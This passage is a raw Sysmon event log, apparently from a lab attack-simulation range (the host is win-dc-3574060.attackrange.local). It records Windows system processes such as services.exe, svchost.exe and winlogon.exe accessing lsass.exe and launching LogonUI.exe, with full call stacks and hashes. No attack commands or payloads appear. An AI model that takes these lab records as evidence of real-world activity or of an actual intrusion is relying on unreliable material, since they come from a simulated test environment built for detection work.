T4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0A00-000000007F01}856952C:\Windows\system32\services.exe{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.816{5D479F2C-16A1-5F84-0F00-000000007F01}1136C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{5D479F2C-16A1-5F84-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-16A1-5F84-0C00-000000007F01}6121104C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.809{5D479F2C-169F-5F84-0B00-000000007F01}864600C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0A00-000000007F01}856C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-169F-5F84-0800-000000007F01}728744C:\Windows\system32\csrss.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-169F-5F84-0900-000000007F01}788792C:\Windows\system32\winlogon.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.799{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b83855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-16A1-5F84-0C00-000000007F01}612924C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:05.793{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-169F-5F84-0900-000000007F01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 